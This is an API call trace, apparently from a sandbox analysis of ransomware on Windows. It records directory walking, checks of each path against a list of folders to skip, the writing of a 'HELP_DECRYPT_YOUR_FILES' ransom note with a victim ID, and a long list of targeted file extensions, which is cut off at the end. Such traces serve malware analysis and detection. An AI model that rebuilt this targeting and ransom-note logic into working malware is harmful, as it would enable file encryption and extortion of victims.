	[0167.955] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0167.956] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0167.956] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0167.956] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0167.956] CloseHandle (hObject=0x390) returned 1
	[0167.957] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x7da20b11, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0167.957] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*") returned 89
	[0167.957] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.957] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*") returned 0x59
	[0167.957] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.958] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="windows") returned 0x0
	[0167.958] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.958] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="boot") returned 0x0
	[0167.958] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.958] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="system volume information") returned 0x0
	[0167.958] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.958] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.959] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.959] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="temp") returned 0x0
	[0167.959] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.959] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="program files") returned 0x0
	[0167.959] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.959] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.959] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.960] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="appdata") returned 0x0
	[0167.960] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.960] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="application data") returned 0x0
	[0167.960] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.960] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="winnt") returned 0x0
	[0167.960] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.960] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="tmp") returned 0x0
	[0167.960] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.961] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="cache") returned 0x0
	[0167.961] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.961] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.961] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.961] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="webcache") returned 0x0
	[0167.961] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.961] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="inetcache") returned 0x0
	[0167.962] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.962] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="nvidia") returned 0x0
	[0167.962] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.962] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="packages") returned 0x0
	[0167.962] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.962] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="cookies") returned 0x0
	[0167.962] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.963] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="programdata") returned 0x0
	[0167.963] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0167.963] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0167.963] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x7da20b11, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0167.963] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0167.963] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1
	[0167.963] lstrcmpW (lpString1="en-US", lpString2="..") returned 1
	[0167.963] lstrcmpW (lpString1="en-US", lpString2=".") returned 1
	[0167.963] lstrcpyW (in: lpString1=0x189b6c, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}"
	[0167.964] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\"
	[0167.964] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="en-US" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US"
	[0167.964] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US"
	[0167.964] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\"
	[0167.964] lstrcpyW (in: lpString1=0x188c54, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\"
	[0167.964] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*"
	[0167.964] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620066, dwReserved1=0x610031, cFileName=".", cAlternateFileName="")) returned 0xfb9530
	[0167.965] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*") returned 95
	[0167.965] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.965] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*", cchLength=0x5f | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*") returned 0x5f
	[0167.965] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.965] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="windows") returned 0x0
	[0167.965] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.966] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="boot") returned 0x0
	[0167.966] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.966] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="system volume information") returned 0x0
	[0167.966] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.966] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.966] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.966] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="temp") returned 0x0
	[0167.966] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.967] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="program files") returned 0x0
	[0167.967] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.967] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.967] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.967] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="appdata") returned 0x0
	[0167.967] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.967] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="application data") returned 0x0
	[0167.968] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.968] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="winnt") returned 0x0
	[0167.968] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.968] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="tmp") returned 0x0
	[0167.968] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.968] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="cache") returned 0x0
	[0167.982] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.982] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.982] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.982] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="webcache") returned 0x0
	[0167.982] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.983] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="inetcache") returned 0x0
	[0167.983] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.983] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="nvidia") returned 0x0
	[0167.983] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.983] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="packages") returned 0x0
	[0167.983] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.983] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="cookies") returned 0x0
	[0167.984] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.984] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="programdata") returned 0x0
	[0167.984] FindNextFileW (in: hFindFile=0xfb9530, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620066, dwReserved1=0x610031, cFileName="..", cAlternateFileName="")) returned 1
	[0167.985] FindNextFileW (in: hFindFile=0xfb9530, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f57a684, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9f57a684, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9f57a684, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0x620066, dwReserved1=0x610031, cFileName="resource.xml", cAlternateFileName="")) returned 1
	[0167.985] lstrcmpW (lpString1="resource.xml", lpString2="..") returned 1
	[0167.985] lstrcmpW (lpString1="resource.xml", lpString2=".") returned 1
	[0167.985] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\"
	[0167.985] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", lpString2="resource.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml"
	[0167.985] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml") returned 104
	[0167.985] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.986] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml", cchLength=0x68 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml") returned 0x68
	[0167.986] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.986] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.986] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml") returned="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"
	[0167.986] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml") returned 104
	[0167.986] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.986] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.987] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0167.987] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.987] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.